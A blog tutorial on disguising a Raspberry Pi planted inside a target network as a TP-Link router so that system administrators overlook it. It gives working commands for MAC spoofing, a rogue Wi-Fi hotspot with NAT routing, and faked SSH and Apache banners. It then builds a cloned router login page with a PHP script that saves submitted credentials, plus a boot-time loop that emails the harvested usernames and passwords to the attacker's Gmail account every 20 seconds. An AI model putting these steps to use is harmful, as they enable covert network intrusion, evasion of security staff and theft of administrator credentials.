Masking raspberry pi to look like and act like a router
This post continuous the story of infiltration in local network onsite with Raspberry pi (link).
When you infiltrate in some serious network, where they have good security team and where system admins do their job on the right way, it is just a manner of time when they will detect your hacking gadget. I mean, when the system admin perform regular scan of the network, and he found new device raspberry pi. Well, I think that we can all imagine the expression on his face. So it is very smart to mask the Pi to looks like something else; like printer, router, windows pc, etc. This will definitely trigger less attention.
In this post I will focus on how to mask raspberry pi to looks like and act like a router. In my case it will looks like TP-Link router. I will also create phishing page for router settings page, with the purpose to catch admins credentials, in the case if he found me and try to login. And I will also set that harvested credentials would be sent on my email.
For the purpose of this post I used raspberry pi w zero with attached two usb wifi antennas.
Here are brief steps we will focus on:
- MAC spoof of both antennas
- Creating of wifi hotspot (password protected and unprotected)
- Hiding of debian version on ssh protocol
- Changing of service name on port 80
- Creating of phishing page – router settings page
- Setting email to receive harvested credentials
1. MAC spoof
Change the MAC address for the both antennas, with the TP-Link Technologies address. Type the following commands
ifconfig wlan1 down
macchanger -m f8:d1:11:2a:24:a3
ifconfig wlan1 up
ifconfig wlan2 down
macchanger -m f8:d1:11:2a:24:a4
ifconfig wlan2 up
service network-manager restart
Note: after reboot the MAC address will be restored to original MAC address, so the best way to keep the spoofed MAC address is to create script which will run after each boot up.
2. Creating wifi hotspot
You can create password protected or unprotected wifi hotspot. For unprotected one I found great tool on github, which is really easy to set up, while creating password protected is a lit a bit more time consuming.
2.1. Password unprotected wifi hotspot
git clone https://github.com/oblique/create_ap
cd create_ap
make install
systemctl start create_ap
create_ap wlan2 wlan1 MyAccessPoint
2.2. Password protected wifi hotspot
Download and install hostapd and dnsmasq.
sudo apt-get install hostapd
sudo apt-get install dnsmasq
service hostapd stop
service dnsmasq stop
Define the hotspot interface and IP ranges in the /etc/dnsmasq.conf.
interface=wlan2mon
dhcp-range=192.168.2.2,192.168.2.20,255.255.255.0,24h
Change the following settings in /etc/hostapd.conf. To define your wifi name change the ssid, and to define password change wpa_passphrase. Also be careful to set the your interface.
interface=wlan2mon
driver=nl80211
ssid=Wifi-name
hw_mode=g
channel=7
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
Note: To make my wifi hotspot working I needed to put my wifi adapter in monitoring mode, otherwise did not work. I done it with teh following command.
airmon-ng start wlan2
You also need to tell to hostapd where the default configuration file is stored. Add the following lines in /etc/default/hostapd.
nano /etc/default/hostapd
DAEMON_CONF=”/etc/hostapd.conf”
Now start up the services:
service hostapd start
service dnsmasq start
Now your hotspot is created but still does not provide you internet access. So, next you need to configure routing between both wifi adapters. In my case wlan1 is connected to the internet, while wlan2 is used for wifi hotspot.
Uncomment the next line to enable packet forwarding for IPv4 in /etc/sysctl.conf.
net.ipv4.ip_forward=1
Run the following command to activate forwarding:
sh -c “echo 1 > /proc/sys/net/ipv4/ip_forward”
Turn the raspberry pi into the router:
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o wlan2mon -m state –state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan2mon -o wlan1 -j ACCEPT
After that save the routing tables into the /etc/iptables.ipv4.nat:
sh -c “iptables-save > /etc/iptables.ipv4.nat”
The following line will restore the routing table whenever the raspberry pi is booted. But in my case was not restored, due to restoring at boot up was performed before wlan2 was putted in monitoring mode (wlan2mon), and practically did not exist yet. But maybe in some circumstances or cases it would work if you figure out to make hotspot running without monitoring mode. However, her is the line which should be added in /etc/network/interfaces.
pre-up iptables-restore < /etc/iptables.ipv4.nat
For the end you need to create bash script which will start up your hotspot. In my case I created hotspot.sh.
!#/bin/bash
ifconfig wlan2mon 192.168.2.1
service dnsmasq restart
hostapd /etc/hostapd.conf
3. Changing of service name on port 22 and 80
For port 22 you should hide debian version on ssh, so it will not look suspicious in association between router and debian distro. To do this, add the following line in /etc/ssh/sshd_config.
DebianBanner no
Next, change apache2 service name. Why we should change it. Well, when you perform scan on the router it is not common to see that apache service is running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.
Install the following:
apt-get update
apt-get install libapache-mod-security
a2enmod mod-security
In the /etc/apache2/conf-enabled/security.conf add following line:
SecServerSignature ‘TP-LINK WR841N WAP http config’
Restart the apache2:
service apache2 restart
Ok, let’s scan raspberry pi to see how convincingly looks like.
Well, it looks convincingly for me.
4. Creating of phishing page – router settings page
With the WebScrpBook plugin capture the page source and put it in the /var/www/html.
After that modify the index.html file. You should modify it by adding/changing action in the form part (action=”action.php”). This function will run action.php after submition and trying login.
Create the action.php file and save it in /var/www/html.
[php]
&amp;amp;amp;amp;lt;?php
$location=’/error’;
header(&amp;amp;amp;amp;quot;Location: &amp;amp;amp;amp;quot; . &amp;amp;amp;amp;quot;http://&amp;amp;amp;amp;quot; . $_SERVER[‘HTTP_HOST’] . $location);
$handle = fopen(&amp;amp;amp;amp;quot;pass.txt&amp;amp;amp;amp;quot;, &amp;amp;amp;amp;quot;a&amp;amp;amp;amp;quot;);
foreach($_POST as $variable =&amp;amp;amp;amp;gt; $value) {
fwrite($handle, $variable);
fwrite($handle, &amp;amp;amp;amp;quot;=&amp;amp;amp;amp;quot;);
fwrite($handle, $value);
fwrite($handle, &amp;amp;amp;amp;quot;\r\n&amp;amp;amp;amp;quot;);
}
fwrite($handle, &amp;amp;amp;amp;quot;\r\n\n\n\n&amp;amp;amp;amp;quot;);
fclose($handle);
exit;
?&amp;amp;amp;amp;gt;
[/php]
So in this code you can see that after login it will redirect you to /error folder. In this folder you can create new index.html file which will render e.g. you have no authority to access this router. All harvested credentials will be saved in pass.txt file.
5. Setting email to receive harvested credentials
To receive harvested credentials on your email (Gmail account) you can use ssmtp.
Install ssmtp:
apt-get install ssmtp
Then, add the following lines in configuration file /etc/ssmtp/ssmtp.conf. Change AuthUser and AuthPass lines.
hostname=localhost
UseSTARTTLS=YES
[email protected]
mailhub=smtp.gmail.com:587
FromLineOverride=YES
[email protected]
AuthPass=Password
UseTLS=YES
Note: In the gmail account settings you need to allow less secure apps to access your account.
Now you need to create script and make it to run on boot up, which will every 20 sec check, if pass.txt file exist, and If exist it will grep username and password from it and sent to your gmail account.
!#/usr/bin/bash
while sleep 20
do
if [ -f /var/www/html/pass.txt ]
then grep -e user -e pass /var/www/html/pass.txt | ssmtp [email protected]
rm -f /var/www/html/pass.txt
fi
done
Decode/Encode powershell payload – base64
Infiltration in local network on site with Raspberry Pi W zero (creating tunnel)
